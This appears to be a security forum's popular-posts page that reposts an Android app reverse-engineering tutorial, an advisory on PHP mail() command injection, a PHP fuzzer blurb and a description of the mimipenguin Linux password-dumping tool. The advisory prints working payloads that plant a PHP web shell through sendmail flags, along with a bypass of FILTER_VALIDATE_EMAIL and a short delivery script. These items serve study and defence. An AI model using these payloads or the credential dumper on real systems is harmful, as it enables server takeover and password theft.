
Leaderboard

Popular Content

Showing content with the highest reputation on 05/05/17 in all areas

  1. Uploaded on 27 Apr 2017 by Max Bazaliy, Vlad Putin, and Alex Hude
    2 points
  2. Ever since ClubPenguin shut down, anyone who gets their ID card from the state also gets a little note with the link to the register here. The system's fucked.
    2 points
  3. Every day we see a bunch of new Android applications being published on the Google Play Store: games, utilities, IoT device clients and so forth. Almost every single aspect of our life can somehow be controlled with "an app". We have smart houses, smart fitness devices and smart coffee machines ... but is this stuff just smart, or is it secure as well? Reversing an Android application can be a (relatively) easy and fun way to answer this question, which is why I decided to write this blog post, where I'll try to explain the basics and share some of my "tricks" to reverse this stuff faster and more effectively. I'm not going to go very deep into technical details; you can learn on your own how Android and the Dalvik VM work. This is a basic practical guide rather than a post full of theory with no really useful content. Let's start!

Prerequisites

In order to follow this introduction to APK reversing there are a few prerequisites:

- A working brain (I don't take this for granted anymore ...).
- An Android smartphone (doh!).
- A basic knowledge of the Java programming language (you understand it if you read it).
- The JRE installed on your computer.
- adb installed.
- Developer Options and USB Debugging enabled on your smartphone.

What is an APK?

An Android application is packaged as an APK (Android Package) file, which is essentially a ZIP file containing the compiled code, the resources, the signature, the manifest and every other file the software needs in order to run. Being a ZIP file, we can start looking at its contents using the unzip command line utility (or any other unarchiver you use):

unzip application.apk -d application

Here's what you will find inside an APK.

/AndroidManifest.xml (file)

This is the binary representation of the XML manifest file describing which permissions the application will request (keep in mind that some of the permissions might be requested at runtime by the app and not declared here), which activities (GUIs), which services (stuff running in the background with no UI) and which receivers (classes that can receive and handle system events such as the device boot or an incoming SMS) it declares. Once decompiled (more on this later), it'll look like this:

<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.company.appname" platformBuildVersionCode="24" platformBuildVersionName="7.0">
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:allowBackup="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:supportsRtl="true" android:theme="@style/AppTheme">
        <activity android:name="com.company.appname.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
    </application>
</manifest>

Keep in mind that this is the perfect starting point to isolate the application "entry points", namely the classes you'll reverse first in order to understand the logic of the whole software. In this case, for instance, we would start by inspecting the com.company.appname.MainActivity class, since it is declared as the main UI of the application.
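For illustration, a minimal Python sketch (the APK file name is just a placeholder) that lists the interesting entries of an APK using nothing but the standard library:

import zipfile

APK = "application.apk"  # placeholder name, use the APK you pulled from the device

INTERESTING = ("AndroidManifest.xml", "classes", "resources.arsc", "META-INF/", "lib/", "assets/", "res/")

with zipfile.ZipFile(APK) as apk:
    for entry in apk.namelist():
        # keep only the entries discussed in this post
        if entry.startswith(INTERESTING):
            info = apk.getinfo(entry)
            print(f"{entry:60s} {info.file_size:10d} bytes")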
/assets/* (folder)

This folder contains application-specific files, like wav files the app might need to play, custom fonts and so on. Reversing-wise it's usually not very important, unless of course you find functional references to such files inside the software.

/res/* (folder)

All the resources, like the activity XML files, images and custom styles, are stored here.

/resources.arsc (file)

This is the "index" of all the resources. Long story short, each resource file is assigned a numeric identifier that the app uses in order to reference that specific entry, and the resources.arsc file maps these files to their identifiers ... nothing very interesting about it.

/classes.dex (file)

This file contains the Dalvik (the virtual machine running Android applications) bytecode of the app; let me explain it better. An Android application is (most of the time) developed using the Java programming language. The Java source files are then compiled into this bytecode, which the Dalvik VM eventually executes ... pretty much what happens to normal Java programs when they're compiled to .class files. Long story short, this file contains the logic, and that's what we're interested in. Sometimes you'll also find a classes2.dex file. This is due to the DEX format having a limit on the number of classes you can declare inside a single dex file; at some point in history Android apps became bigger and bigger, so Google had to adapt the format to support a secondary .dex file where more classes can be declared. From our perspective it doesn't matter: the tools we're going to use are able to detect it and append it to the decompilation pipeline.

/libs/ (folder)

Sometimes an app needs to execute native code: it can be an image processing library, a game engine or whatever. In such cases, those .so ELF libraries will be found inside the libs folder, divided into architecture-specific subfolders (so the app will run on ARM, ARM64, x86, etc.).

/META-INF/ (folder)

Every Android application needs to be signed with a developer certificate in order to run on a device; even debug builds are signed by a debug certificate. The META-INF folder contains information about the files inside the APK and about the developer. Inside this folder, you'll usually find:

- A MANIFEST.MF file with the SHA-1 or SHA-256 hashes of all the files inside the APK.
- A CERT.SF file, pretty much like the MANIFEST.MF, but signed with the RSA key.
- A CERT.RSA file which contains the developer public key used to sign the CERT.SF file and digests.

These files are very important in order to guarantee the APK integrity and the ownership of the code. Sometimes inspecting the signature can be very handy to determine who really developed a given APK.
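To get a feel for how MANIFEST.MF ties the files together, here is a rough Python sketch that recomputes the per-file digests and compares them against the manifest. It assumes SHA-256-Digest entries and ignores wrapped continuation lines; older APKs may use SHA1-Digest instead, so adjust accordingly:

import base64, hashlib, zipfile

APK = "application.apk"  # placeholder name

with zipfile.ZipFile(APK) as apk:
    manifest = apk.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    name = None
    for line in manifest.splitlines():
        if line.startswith("Name: "):
            name = line[len("Name: "):]
        elif line.startswith("SHA-256-Digest: ") and name:
            expected = line[len("SHA-256-Digest: "):]
            actual = base64.b64encode(hashlib.sha256(apk.read(name)).digest()).decode()
            print("OK      " + name if actual == expected else "MISMATCH " + name)
            name = None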
If you want to get information about the developer, you can use the openssl command line utility:

openssl pkcs7 -in /path/to/extracted/apk/META-INF/CERT.RSA -inform DER -print

This will print an output like:

PKCS7:
  type: pkcs7-signedData (1.2.840.113549.1.7.2)
  d.sign:
    version: 1
    md_algs:
        algorithm: sha1 (1.3.14.3.2.26)
        parameter: NULL
    contents:
      type: pkcs7-data (1.2.840.113549.1.7.1)
      d.data: <ABSENT>
    cert:
        cert_info:
          version: 2
          serialNumber: 10394279457707717180
          signature:
            algorithm: sha1WithRSAEncryption (1.2.840.113549.1.1.5)
            parameter: NULL
          issuer: C=TW, ST=Taiwan, L=Taipei, O=ASUS, OU=PMD, CN=ASUS AMAX Key/emailAddress=admin@asus.com
          validity:
            notBefore: Jul  8 11:39:39 2013 GMT
            notAfter: Nov 23 11:39:39 2040 GMT
          subject: C=TW, ST=Taiwan, L=Taipei, O=ASUS, OU=PMD, CN=ASUS AMAX Key/emailAddress=admin@asus.com
          key:
            algor:
              algorithm: rsaEncryption (1.2.840.113549.1.1.1)
              parameter: NULL
            public_key: (0 unused bits)
            ...

This can be gold for us; for instance, we could use this information to determine whether an app was really signed by (let's say) Google or whether it was resigned, and therefore modified, by a third party.

How do I get the APK of an app?

Now that we have a basic idea of what we're supposed to find inside an APK, we need a way to actually get the APK file of the application we're interested in. There are two ways: either you install it on your device and use adb to get it, or you use an online service to download it.

Pulling an app with ADB

First of all, let's plug our smartphone into the USB port of our computer and get a list of the installed packages and their namespaces:

adb shell pm list packages

This will list all packages on your smartphone. Once you've found the namespace of the package you want to reverse (com.android.systemui in this example), let's see what its physical path is:

adb shell pm path com.android.systemui

Finally, we have the APK path:

package:/system/priv-app/SystemUIGoogle/SystemUIGoogle.apk

Let's pull it from the device:

adb pull /system/priv-app/SystemUIGoogle/SystemUIGoogle.apk

And here you go, you have the APK you want to reverse! (A small script that automates these steps is sketched at the end of this section.)

Using an Online Service

Multiple online services are available if you don't want to install the app on your device (for instance, if you're reversing a malware sample you want to have the file first and install it on a clean device only afterwards). Here's a list of the ones I use:

- Apk-DL
- Evozi Downloader
- Apk Leecher

Keep in mind that once you download the APK from these services, it's a good idea to check the developer certificate as previously shown, in order to be 100% sure you downloaded the correct APK and not some repackaged and resigned stuff full of ads and possibly malware.
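Going back to the ADB route, the pull workflow above can also be scripted. A minimal sketch (the package name is just an example) that wraps adb via subprocess:

import subprocess, sys

PACKAGE = "com.android.systemui"  # example namespace

def adb(*args):
    # run an adb command and return its stdout as text
    return subprocess.run(["adb", *args], capture_output=True, text=True, check=True).stdout

out = adb("shell", "pm", "path", PACKAGE).strip()
if not out:
    sys.exit(f"package {PACKAGE} not found")
# take the first line in case of split APKs: "package:/system/priv-app/.../SystemUIGoogle.apk"
path = out.splitlines()[0].replace("package:", "")
adb("pull", path, f"{PACKAGE}.apk")
print(f"pulled {path} -> {PACKAGE}.apk")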
Network Analysis

Now we start with some tests in order to understand what the app is doing while executed. My first test usually consists in inspecting the network traffic generated by the application itself and, in order to do that, my tool of choice is bettercap ... well, that's why I developed it in the first place. Make sure you have bettercap installed and that both your computer and the Android device are on the same wifi network, then you can start MITM-ing the smartphone (192.168.1.5 in this example) and see its traffic in realtime from the terminal:

sudo bettercap -T 192.168.1.5 -X

The -X option will enable the sniffer. As soon as you start the app you should see a bunch of HTTP and/or HTTPS servers being contacted; now you know who the app is sending data to, so let's see what data it is sending:

sudo bettercap -T 192.168.1.5 --proxy --proxy-https --no-sslstrip

This will switch from passive sniffing mode to proxying mode: all the HTTP and HTTPS traffic will be intercepted (and, if needed, modified) by bettercap. If the app is correctly using public key pinning (as every application should) you will not be able to see its HTTPS traffic but, unfortunately, in my experience this only happens for a very small number of apps. From now on, keep triggering actions in the app while inspecting the traffic (you can also use Wireshark in parallel to get a PCAP capture file to inspect later) and after a while you should have a more or less complete idea of what protocol it's using and for what purpose.

Static Analysis

After the network analysis we have collected a bunch of URLs and packets. We can use this information as our starting point: that's what we will be looking for while performing static analysis on the app. "Static analysis" means that you will not execute the app, but rather just study its code. Most of the time this is all you'll ever need to reverse something. There are different tools you can use for this purpose, so let's take a look at the most popular ones.

apktool

APKTool is the very first tool you want to use. It is capable of decompiling the AndroidManifest file to its original XML format, as well as the resources.arsc file, and it will also convert the classes.dex (and classes2.dex if present) file to an intermediary language called SMALI, an ASM-like language used to represent the Dalvik VM opcodes in a human-readable form. It looks like this:

.super Ljava/lang/Object;
.method public static main([Ljava/lang/String;)V
    .registers 2
    sget-object v0, Ljava/lang/System;->out:Ljava/io/PrintStream;
    const-string v1, "Hello World!"
    invoke-virtual {v0, v1}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V
    return-void
.end method

But don't worry, in most cases this is not the final language you're going to read in order to reverse the app. Given an APK, this command line will decompile it:

apktool d application.apk

Once finished, the application folder is created and you'll find all the output of apktool in there. You can also use apktool to decompile an APK, modify it and then recompile it (like I did with the Nike+ app in order to have more debug logs, for instance) but, unless the other tools fail to decompile it, it's unlikely that you'll need to read smali code in order to reverse the application. Let's get to the other tools now.
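Before moving on, one quick trick: the smali produced by apktool lends itself to simple greps. A sketch (file and folder names are illustrative) that decodes an APK and pulls out hard-coded URLs from the const-string instructions:

import os, re, subprocess

APK, OUT = "application.apk", "application"  # illustrative paths

# decode resources and smali with apktool (must be on the PATH)
subprocess.run(["apktool", "d", APK, "-o", OUT, "-f"], check=True)

url_re = re.compile(r'const-string [^,]+, "(https?://[^"]+)"')
for root, _, files in os.walk(OUT):
    for name in files:
        if name.endswith(".smali"):
            with open(os.path.join(root, name), encoding="utf-8", errors="replace") as fh:
                for match in url_re.finditer(fh.read()):
                    print(match.group(1))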
jADX

The jADX suite allows you to simply load an APK and look at its Java source code. What's happening under the hood is that jADX decompiles the APK to smali and then converts the smali back to Java. Needless to say, reading Java code is much easier than reading smali, as I already mentioned. Once the APK is loaded, you'll see a UI like this:

One of the best features of jADX is the string/symbol search (the button) that allows you to search for URLs, strings, methods and whatever else you want to find inside the codebase of the app. There's also the Find Usage menu option: just highlight some symbol and right click on it, and this feature will give you a list of every reference to that symbol.

Dex2Jar and JD-Gui

Similar to jADX are the dex2jar and JD-GUI tools. Once installed, you'll use dex2jar to convert an APK to a JAR file:

/path/to/dex2jar/d2j-dex2jar.sh application.apk

Once you have the JAR file, simply open it with JD-GUI and you'll see its Java code, pretty much like with jADX. Unfortunately JD-GUI is not as feature-rich as jADX, but sometimes when one tool fails you have to try another one and hope to be luckier.

JEB

As your last resort, you can try the JEB decompiler. It's a very good piece of software, but unfortunately it's not free; there's a trial version if you want to give it a shot. Here's how it looks. JEB also features an ARM disassembler (useful when there are native libraries in the APK) and a debugger (very useful for dynamic analysis) but, again, it's not free and it's not cheap.

Static Analysis of Native Binaries

As previously mentioned, sometimes you'll find native libraries (.so shared objects) inside the lib folder of the APK and, while reading the Java code, you'll find native method declarations like the following:

public native String stringFromJNI();

The native keyword means that the method implementation is not inside the dex file; instead, it's declared and executed from native code through what is called the Java Native Interface, or JNI. Close to native methods you'll also usually find something like this:

System.loadLibrary("hello-jni");

This tells you in which native library the method is implemented. In such cases, you will need an ARM (or x86, if there's an x86 subfolder inside the libs folder) disassembler in order to reverse the native object.

IDA

The very first disassembler and decompiler that every decent reverser should know about is Hex-Rays IDA, which is the state of the art reversing tool for native code. Along with an IDA license, you can also buy a decompiler license, in which case IDA will also be able to rebuild pseudo C-like code from the assembly, allowing you to read a higher level representation of the library logic. Unfortunately IDA is a very expensive piece of software and, unless you're reversing native stuff professionally, it's really not worth spending all that money on a single tool ... warez ... ehm ...

Hopper

If you're on a budget but you need to reverse native code, instead of IDA you can give Hopper a try. It's definitely not as good and complete as IDA, but it's much cheaper and will be good enough for most cases. Hopper supports GNU/Linux and macOS (no Windows!) and, just like IDA, has a builtin decompiler which is quite decent considering its price.

Dynamic Analysis

When static analysis is not enough, maybe because the application is obfuscated or the codebase is simply too big and complex to quickly isolate the routines you're interested in, you need to go dynamic. Dynamic analysis simply means that you'll execute the app (like we did while performing network analysis) and somehow trace its execution using different tools, strategies and methods.
Sandboxing

Sandboxing is a black-box dynamic analysis strategy, which means you're not going to actively trace into the application code (like you do while debugging); instead you'll execute the app inside some container that will log the most relevant actions for you and present a report at the end of the execution.

Cuckoo-Droid

Cuckoo-Droid is an Android port of the famous Cuckoo sandbox. Once installed and configured, it'll give you an activity report with all the URLs the app contacted, all the DNS queries, API calls and so forth.

Joe Sandbox

The mobile Joe Sandbox is a great online service that allows you to upload an APK and get its activity report without the hassle of installing or configuring anything. This is a sample report; as you can see the kind of information is pretty much the same as Cuckoo-Droid's, plus there are a bunch of heuristics being executed in order to behaviourally correlate the sample to other known applications.

Debugging

If sandboxing is not enough and you need deeper insight into the application behaviour, you'll need to debug it. Debugging an app, in case you don't know, means attaching to the running process with a debugger, placing breakpoints that allow you to stop the execution and inspect the memory state, and stepping through the code line by line in order to follow the execution graph very closely.

Enabling Debug Mode

When an application is compiled and eventually published to the Google Play Store, it's usually a release build you're looking at, meaning debugging has been disabled by the developer and you can't attach to it directly. In order to enable debugging again, we'll need to use apktool to decompile the app:

apktool d application.apk

Then you'll need to edit the generated AndroidManifest.xml file, adding the android:debuggable="true" attribute to its application XML node:

<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.company.appname" platformBuildVersionCode="24" platformBuildVersionName="7.0">
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:allowBackup="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:supportsRtl="true" android:theme="@style/AppTheme" android:debuggable="true"> <!-- !!! NOTICE ME !!! -->
        <activity android:name="com.company.appname.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
    </application>
</manifest>

Once you've updated the manifest, let's rebuild the app:

apktool b -d application_path output.apk

Now let's resign it:

git clone https://github.com/appium/sign
java -jar sign/dist/signapk.jar sign/testkey.x509.pem sign/testkey.pk8 output.apk signed.apk

And reinstall it on the device (make sure you uninstalled the original version first):

adb install signed.apk

Now you can proceed to debug the app.

Android Studio

Android Studio is the official Android IDE. Once you have debug mode enabled for your app, you can directly attach to it using this IDE and start debugging.

IDA

If you have an IDA license that supports Dalvik debugging, you can attach to a running process and step through the smali code. This document describes how to do it, but basically the idea is that you upload the ARM debugging server (a native ARM binary) to your device, start it using adb and eventually start your debugging session from IDA.

Dynamic Instrumentation

Dynamic instrumentation means that you want to modify the application behaviour at runtime, and in order to do so you inject some "agent" into the app that you'll eventually use to instrument it. You might want to do this in order to make the app bypass some checks (for instance, if public key pinning is enforced, you might want to disable it with dynamic instrumentation in order to easily inspect the HTTPS traffic), make it show you information it's not supposed to show (unlock "Pro" features, or debug/admin activities), etc.

Frida

Frida is a great and free tool you can use to inject a whole Javascript engine into a running process on Android, iOS and many other platforms ... but why Javascript? Because once the engine is injected, you can instrument the app in very cool and easy ways like this:

from __future__ import print_function
import frida
import sys

# let's attach to the 'hello' process
session = frida.attach("hello")

# now let's create the Javascript we want to inject
script = session.create_script("""
Interceptor.attach(ptr("%s"), {
    onEnter: function(args) {
        send(args[0].toInt32());
    }
});
""" % int(sys.argv[1], 16))

# this function will receive events from the js
def on_message(message, data):
    print(message)

# let's start!
script.on('message', on_message)
script.load()
sys.stdin.read()

In this example we're just inspecting some function argument, but there are hundreds of things you can do with Frida, just RTFM! and use your imagination. Here's a list of cool Frida resources, enjoy!
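On Android specifically, Frida can also instrument Java methods through its Java bridge. A hedged sketch (it assumes frida-server is already running on the device and hooks the same updateClock method used in the XPosed example below; the process name may differ on your build):

import frida

js = """
Java.perform(function () {
    var Clock = Java.use("com.android.systemui.statusbar.policy.Clock");
    Clock.updateClock.implementation = function () {
        send("updateClock() called");
        return this.updateClock();  // call the original implementation
    };
});
"""

session = frida.get_usb_device().attach("com.android.systemui")
script = session.create_script(js)
script.on("message", lambda message, data: print(message))
script.load()
input("Hooked, press ENTER to quit...")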
XPosed

Another option we have for instrumenting our app is the XPosed Framework. XPosed is basically an instrumentation layer for the whole Dalvik VM, and it requires a rooted phone in order to be installed. From the XPosed wiki:

There is a process that is called "Zygote". This is the heart of the Android runtime. Every application is started as a copy ("fork") of it. This process is started by an /init.rc script when the phone is booted. The process start is done with /system/bin/app_process, which loads the needed classes and invokes the initialization methods. This is where Xposed comes into play. When you install the framework, an extended app_process executable is copied to /system/bin. This extended startup process adds an additional jar to the classpath and calls methods from there at certain places. For instance, just after the VM has been created, even before the main method of Zygote has been called. And inside that method, we are part of Zygote and can act in its context. The jar is located at /data/data/de.robv.android.xposed.installer/bin/XposedBridge.jar and its source code can be found here. Looking at the class XposedBridge, you can see the main method. This is what I wrote about above, this gets called in the very beginning of the process. Some initializations are done there and also the modules are loaded (I will come back to module loading later).

Once you've installed XPosed on your smartphone, you can start developing your own module (again, follow the project wiki). For instance, here's an example of how you would hook the updateClock method of the SystemUI application in order to instrument it:

package de.robv.android.xposed.mods.tutorial;

import static de.robv.android.xposed.XposedHelpers.findAndHookMethod;
import de.robv.android.xposed.IXposedHookLoadPackage;
import de.robv.android.xposed.XC_MethodHook;
import de.robv.android.xposed.callbacks.XC_LoadPackage.LoadPackageParam;

public class Tutorial implements IXposedHookLoadPackage {
    public void handleLoadPackage(final LoadPackageParam lpparam) throws Throwable {
        if (!lpparam.packageName.equals("com.android.systemui"))
            return;

        findAndHookMethod("com.android.systemui.statusbar.policy.Clock", lpparam.classLoader, "updateClock", new XC_MethodHook() {
            @Override
            protected void beforeHookedMethod(MethodHookParam param) throws Throwable {
                // this will be called before the clock was updated by the original method
            }

            @Override
            protected void afterHookedMethod(MethodHookParam param) throws Throwable {
                // this will be called after the clock was updated by the original method
            }
        });
    }
}

There are already a lot of user-contributed modules you can use, study and modify for your own needs.

Conclusion

I hope you'll find this reference guide useful for your Android reversing adventures. Keep in mind that the most important thing while reversing is not the tool you're using, but how you use it, so you'll have to learn how to choose the appropriate tool for your scenario, and this is something you can only learn with experience ... so enough reading, and start reversing!

Source: https://www.evilsocket.net/2017/04/27/Android-Applications-Reversing-101/
    1 point
  4. Hi all, while surfing various IRC channels I have come across a list of very useful links and courses to get into hacking. URL: https://ghostbin.com/paste/j858d There are courses on computer basics, hacking, programming and many more. Good luck on your long journey of learning!
    1 point
  5. Why mail() is dangerous in PHP

3 May 2017 by Robin Peraglie

During our advent of PHP application vulnerabilities, we reported a remote command execution vulnerability in the popular webmailer Roundcube (CVE-2016-9920). This vulnerability allowed a malicious user to execute arbitrary system commands on the targeted server by simply writing an email via the Roundcube interface. After we reported the vulnerability to the vendor and released our blog post, similar security vulnerabilities based on PHP's built-in mail() function popped up in other PHP applications [1] [2] [3] [4]. In this post, we have a look at the common ground of these vulnerabilities, which security patches are faulty, and how to use mail() securely.

The PHP mail() function

PHP comes with the built-in function mail() for sending emails from a PHP application. The mail delivery can be configured using the following five parameters (http://php.net/manual/en/function.mail.php):

bool mail( string $to, string $subject, string $message [, string $additional_headers [, string $additional_parameters ]] )

The first three parameters of this function are self-explanatory and less sensitive, as they are not affected by injection attacks. Still, be aware that if the to parameter can be controlled by the user, she can send spam emails to an arbitrary address.

Email header injection

The last two optional parameters are more concerning. The fourth parameter $additional_headers receives a string which is appended to the email header. Here, additional email headers can be specified, for example From: and Reply-To:. Since mail headers are separated by the CRLF newline sequence \r\n [5], an attacker can use these characters to append additional email headers when user input is used unsanitized in the fourth parameter. This attack is known as Email Header Injection (or, in short, Email Injection). It can be abused to send out multiple spam emails by adding several email addresses to an injected CC: or BCC: header. Note that some mail programs replace \n with \r\n automatically.

Why the 5th parameter of mail() is extremely dangerous

In order to use the mail() function in PHP, an email program or server has to be configured. The following two options can be used in the php.ini configuration file:

- Configure an SMTP server's hostname and port to which PHP connects
- Configure the file path of a mail program that PHP uses as a Mail Transfer Agent (MTA)

When PHP is configured with the second option, calls to the mail() function will result in the execution of the configured MTA program. Although PHP internally applies escapeshellcmd() to the program call, which prevents an injection of new shell commands, the 5th argument $additional_parameters of mail() allows the addition of new program arguments to the MTA. Thus, an attacker can append program flags which in some MTAs enable the creation of a file with user-controlled content.

Vulnerable Code

mail("myfriend@example.com", "subject", "message", "", "-f" . $_GET['from']);

The code shown above is prone to a remote command execution that is easily overlooked. The GET parameter from is used unsanitized and allows an attacker to pass additional parameters to the mail program. For example, in sendmail, the parameter -O can be used to reconfigure sendmail options and the parameter -X specifies the location of a log file.

Proof of Concept

example@example.com -OQueueDirectory=/tmp -X/var/www/html/rce.php

The proof of concept will drop a PHP shell in the web directory of the application. This file contains log information that can be tainted with PHP code. Thus, an attacker is able to execute arbitrary PHP code on the web server when accessing the rce.php file. You can find more information on how to exploit this issue in our blog post and here.
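To see the injection end to end, here is a hedged sketch of how the proof of concept could be delivered against a hypothetical vulnerable endpoint (the URL and script name are made up for illustration; the vulnerable code above reads $_GET['from']):

import requests

target = "http://victim.example/sendmail.php"  # entirely hypothetical target
payload = "example@example.com -OQueueDirectory=/tmp -X/var/www/html/rce.php"

# requests takes care of URL-encoding the spaces and slashes in the parameter
requests.get(target, params={"from": payload}, timeout=10)

# If the MTA is sendmail, the -X flag makes it log to rce.php inside the web
# root; log lines containing attacker-controlled PHP then execute when
# rce.php is requested from the server.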
Latest related security vulnerabilities

The 5th parameter is indeed used in a vulnerable way in many real-world applications. The following popular PHP applications were lately found to be affected, all by the same previously described security issue (mostly reported by Dawid Golunski):

Application      Version         Reference
Roundcube        <= 1.2.2        CVE-2016-9920
MediaWiki        < 1.29          Discussion
PHPMailer        <= 5.2.18       CVE-2016-10033
Zend Framework   < 2.4.11        CVE-2016-10034
SwiftMailer      <= 5.4.5-DEV    CVE-2016-10074
SquirrelMail     <= 1.4.23       CVE-2017-7692

Due to the integration of these affected libraries, other widely used applications, such as Wordpress, Joomla and Drupal, were partly affected as well.

Why escapeshellarg() is not secure

PHP offers escapeshellcmd() and escapeshellarg() to secure user input used in system commands or arguments. Intuitively, the following PHP statement looks secure and prevents a break out of the -param1 parameter:

system(escapeshellcmd("./program -param1 ". escapeshellarg( $_GET['arg'] )));

However, against all instincts, this statement is insecure when the program has other exploitable parameters. An attacker can break out of the -param1 parameter by injecting "foobar' -param2 payload ". After both escapeshell* functions have processed this input, the following string will reach the system() function:

./program -param1 'foobar'\\'' -param2 payload \'

As can be seen from the executed command, the two nested escaping functions confuse the quoting and allow appending another parameter, param2. PHP's mail() internally uses the escapeshellcmd() function in order to protect against command injection attacks. This is exactly why escapeshellarg() does not prevent the attack when used for the 5th parameter of mail(). The developers of Roundcube and PHPMailer implemented this faulty patch at first.

Why FILTER_VALIDATE_EMAIL is not secure

Another intuitive approach is to use PHP's email filter in order to ensure that only a valid email address is used in the 5th parameter of mail():

filter_var($email, FILTER_VALIDATE_EMAIL)

However, not all characters that are necessary to exploit the security issue in mail() are forbidden by this filter. It allows the usage of escaped whitespaces nested in double quotes. Due to the nature of the underlying regular expression it is possible to overlap single and double quotes and trick filter_var() into thinking we are inside double quotes, although mail()'s internal escapeshellcmd() thinks we are not:

'a."'\ -OQueueDirectory=\%0D<?=eval($_GET[c])?>\ -X/var/www/html/"@a.php

For the url-encoded input given here, the filter_var() function returns true and rates the payload as a valid email address. This has a critical impact when using this function as the sole security measure: similar to our original attack, our malicious "email address" would cause sendmail to print the following error into our newly generated shell "@a.php in our webroot:

<?=eval($_GET[c])?>\/): No such file or directory

Remember that filter_var() is not appropriate for user-input sanitization and was never designed for such cases, as it is too loose regarding several characters.
How to use mail() securely

Carefully analyze the arguments of each call to mail() in your application for the following conditions:

- Argument (to): unless intended, no user input is used directly
- Argument (subject): safe to use
- Argument (message): safe to use
- Argument (headers): all \r and \n characters are stripped
- Argument (parameters): no user input is used

In fact, there is no guaranteed safe way to use user-supplied data in shell commands and you should not try your luck. In case your application does require user input in the 5th argument, a restrictive email filter can be applied that limits any input to a minimal set of characters, even though it breaks RFC compliance. We recommend not trusting any escaping or quoting routine, as history has shown that these functions can or will be broken, especially when used in different environments. An alternative approach is developed by Paul Buonopane and can be found here.

Summary

Many PHP applications send emails to their users, for example reminders and notifications. While email header injections are widely known, a remote command execution vulnerability is rarely considered when using mail(). In this post, we have highlighted the risks of the 5th mail() parameter and how to protect against attacks that can result in full server compromise. Make sure your application uses this built-in function safely!

[1] https://phabricator.wikimedia.org/T152717 [return]
[2] https://framework.zend.com/security/advisory/ZF2016-04 [return]
[3] http://seclists.org/fulldisclosure/2017/Apr/86 [return]
[4] https://packetstormsecurity.com/files/140290/swiftmailer-exec.txt [return]
[5] http://www.ietf.org/rfc/rfc822.txt [return]

Source: https://www.ripstech.com/blog/2017/why-mail-is-dangerous-in-php/
    1 point
  6. PHP Vulnerability Hunter

Overview

PHP Vulnerability Hunter is an advanced whitebox PHP web application fuzzer that scans for several different classes of vulnerabilities via static and dynamic analysis. By instrumenting application code, PHP Vulnerability Hunter is able to achieve greater code coverage and uncover more bugs.

Key Features

Automated Input Mapping
While most web application fuzzers rely on the user to specify application inputs, PHP Vulnerability Hunter uses a combination of static and dynamic analysis to automatically map the target application. Because it works by instrumenting the application, PHP Vulnerability Hunter can detect inputs that are not referenced in the forms of the rendered page.

Several Scan Modes
PHP Vulnerability Hunter is aware of many different types of vulnerabilities found in PHP applications, from the most common, such as cross-site scripting and local file inclusion, to the lesser known, such as user controlled function invocation and class instantiation. PHP Vulnerability Hunter can detect the following classes of vulnerabilities:

- Arbitrary command execution
- Arbitrary file read/write/change/rename/delete
- Local file inclusion
- Arbitrary PHP execution
- SQL injection
- User controlled function invocation
- User controlled class instantiation
- Reflected cross-site scripting (XSS)
- Open redirect
- Full path disclosure

Code Coverage
Get measurements of how much code was executed during a scan, broken down by scan plugin and page. Code coverage can be calculated at either the function level or the code block level.

Scan Phases

Initialization Phase
During this phase, interesting function calls within each code file are hooked, and if code coverage is enabled the code is annotated. Static analysis is performed on the code to detect inputs.

Scan Phase
This is where the bugs are uncovered. PHP Vulnerability Hunter iterates through its different scan plugins and plugin modes, scanning every file within the targeted application. Each time a page is requested, dynamic analysis is performed to discover new inputs and bugs.

Uninitialization
Once the scan phase is complete, all of the application files are restored from backups made during the initialization phase.

Link: https://www.autosectools.com/PHP-Vulnerability-Scanner
    1 point
  7. mimipenguin

A tool to dump the login password of the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz.

Details

Takes advantage of cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. It will attempt to calculate each word's probability by checking hashes in /etc/shadow, hashes in memory, and regex searches. Requires root permissions.

Supported/Tested Systems

- Kali 4.3.0 (rolling) x64 (gdm3)
- Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
- Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
- XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2)
- Archlinux x64 Gnome 3 (Gnome Keyring 3.20)
- VSFTPd 3.0.3-8+b1 (Active FTP client connections)
- Apache2 2.4.25-3 (Active/Old HTTP BASIC AUTH Sessions) [Gcore dependency]
- openssh-server 1:7.3p1-1 (Active SSH connections - sudo usage)

Notes

- Password moves in memory - still honing in on 100% effectiveness
- Plan on expanding support and other credential locations
- Working on expanding to non-desktop environments
- Known bug - sometimes gcore hangs the script; this is a problem with gcore
- Open to pull requests and community research
- LDAP research (nscld, winbind, etc.) planned for future

Development Roadmap

MimiPenguin is slowly being ported to multiple languages to support all possible post-exploit scenarios. The roadmap below was suggested by KINGSABRI to track the various versions and features. An "X" denotes full support while a "~" denotes a feature with known bugs.

Feature                                             .sh   .py
GDM password (Kali Desktop, Debian Desktop)          ~     X
Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop)    X     X
VSFTPd (Active FTP Connections)                      X     X
Apache2 (Active HTTP Basic Auth Sessions)            ~     ~
OpenSSH (Active SSH Sessions - Sudo Usage)           ~     ~

Contact

Twitter: @huntergregal
Website: huntergregal.com
Github: huntergregal

Licence

CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/

Special Thanks

- the-useless-one for removing Gcore as a dependency, cleaning up tabs, adding an output option, and a full python3 port
- gentilkiwi for Mimikatz, the inspiration and the twitter shoutout
